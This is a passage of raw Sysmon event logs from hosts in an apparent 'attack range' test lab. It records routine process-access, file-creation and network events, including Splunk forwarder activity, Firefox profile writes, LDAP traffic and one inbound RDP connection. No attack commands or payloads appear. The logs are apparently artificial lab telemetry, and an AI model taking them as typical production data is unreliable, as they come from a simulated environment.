07:43:53.487{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045908Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:53.487{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045907Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:53.487{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045906Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:53.487{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F2B9-60EB-EB7C-00000000CF01}4228C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001045905Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:53.487{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F2B9-60EB-EB7C-00000000CF01}4228C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001045904Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:53.482{466BC892-F2B9-60EB-EB7C-00000000CF01}4228C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001045903Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:53.287{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=8AEC05EB6B578A79FA74D561A279507A,SHA256=D81027696BB44DF8596BE262978DCF9B09D1AE3B3D81370CE73DB43C27737D68,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045902Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:53.287{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=1A9B21082B0187C1488CE30BA455CC6A,SHA256=FABB4FFC11B736A6DECA37A2B61E530A8DE041E237F19561760EDFEDB4826526,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045901Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:53.287{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=E483D43A052D48F5B499011D5F02576E,SHA256=40A8751BCEB02BFD8052C20515264F56FB8296AB1CA6972BD3C08F34B6F60A87,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045900Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:53.287{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=C9655A72FBD2056C779BECAB29470A35,SHA256=EC9EE230E1DDA8EBAB1146AF3381481C1BA06795323160E856809FCD5F153ECD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045899Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:53.287{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=FBAA04BC7D06E622D6F14078521B6D42,SHA256=5B7ABC468DBED5F072968E42B09AA099B03FC723AB589586951D53909C2F4498,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045898Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:53.287{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=F63505866B8F3DEA89E97025CE408D63,SHA256=830D77DA9EA87D3329DDF5E67BF20906B00C6346ABCB757EB5014AC98540C3D2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045897Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:53.287{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=F0650E538054F9C3A6AC3BC9A414BAE3,SHA256=FF8FC7A30C74EF84E5375DDEBFD8790356DB0A90A5ECD990A984557894CCAD83,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045896Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:53.286{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=D318B26277E458D8BBCFA6BDB603D030,SHA256=C4D47F04634EA120C176548CE6035265A087390598D411FB1A82D61A57540DEB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045895Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:53.285{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=66E2BB82E74BBCC452FAE6EED701AE3F,SHA256=0BCBCBA5A2F27CBDCA0F83CDDB3661FA7ACBBDD45FDEC9D330598662178C5086,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045894Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:53.284{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=1943E61F7167FD89431CA24B172EBFDF,SHA256=4FBD2B74781241AAC94F8E44518E982AAD3765C1514A77C1F063796DEF724A50,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045893Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:53.282{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=4EA1A58E8BF748457118E000CEBBA008,SHA256=065C3047B2D937A70E318BFC2F44DC3261E0B69335E46297E0DC7CDFD66F727C,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001045892Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:44.445{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local50899-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local389ldap 354300x80000000000000001045891Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:44.445{466BC892-02BC-60E8-3000-00000000CF01}2160C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local50899-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local389ldap 354300x80000000000000001045890Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:44.435{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local50898-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local389ldap 354300x80000000000000001045889Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:44.435{466BC892-02BC-60E8-3000-00000000CF01}2160C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local50898-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local389ldap 23542300x80000000000000001045923Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:54.786{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8435CE5F5FDB571FA1233ED003A1085F,SHA256=ADD53E8B07ED7FA64A275804A5C2D6EFF66039982099FF27C7324833D8359801,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806030Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:54.098{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ABAA14F28AB8A32D6D8C423EEA2284E7,SHA256=38918E8264CB9D6291929DE78CE0A8AEF6A8D4ADB669E870550E71CC9A81D11B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001045922Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:54.165{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F2BA-60EB-EC7C-00000000CF01}8628C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045921Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:54.165{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045920Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:54.165{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045919Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:54.165{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045918Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:54.165{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045917Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:54.165{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F2BA-60EB-EC7C-00000000CF01}8628C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001045916Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:54.165{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F2BA-60EB-EC7C-00000000CF01}8628C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001045915Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:54.151{466BC892-F2BA-60EB-EC7C-00000000CF01}8628C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001045926Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:55.817{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9433F5118046846DBA501EDFC91271C1,SHA256=CE2137F7EC7AA4105996E2D9B2D571B4A5E8ED3A12A18A14C985D32AD59BFD6B,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806032Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:54.237{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse122.226.223.195-59286-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 23542300x8000000000000000806031Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:55.098{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=62B871AEC74EA4857E2CC5BBB13CCA57,SHA256=08EC9FD9864ADB942F7AE31EE52DFE4F0BE8E7F41FE4F22664FECDDAE8D20AA8,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001045925Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:46.759{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50900-false10.0.1.12-8000- 23542300x80000000000000001045924Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:55.164{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5FFD8A398F93F7E17CFB1F06096DD8A4,SHA256=65E120EC0BD575A31EA318AD0A28549CF7325F17CCA572EF5A253267AC957C1B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045928Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:56.848{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=95FB31B565B6BC58A1BF525711722313,SHA256=73C420E94C8F4AC57F9DB3CDB2110FA4590CE35BB0AC7CEBF9A8C2F8CF758882,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806035Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:56.582{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8144061D94BE60169DD3A6AABA4C8C89,SHA256=B902A100C46DDCA510FE94EB5FF14DF5FB36E5C371A246F037EC7A3F9B2895D8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806034Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:56.582{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7DC534C9AA5222E16143A8DB6E712EF5,SHA256=E77F7BF9A4A9657441FAC2D5AADF43AC793238432AF7D551AD803B47B1446374,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806033Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:56.129{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D7A493471BC8517D7DEAF24AB75A06E5,SHA256=57F535522CE76D6EEB911DAB78B588F5E1C3522990543A749AAAEA48582E3823,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045927Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:56.732{466BC892-02BC-60E8-2A00-00000000CF01}2928NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=DD4D1D185AB4AED8A391DDEB7814ED87,SHA256=CA570F672172721E4189F1D4FCAE899B45A155271730C13B6A88FE6BC47AB312,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045929Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:57.863{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 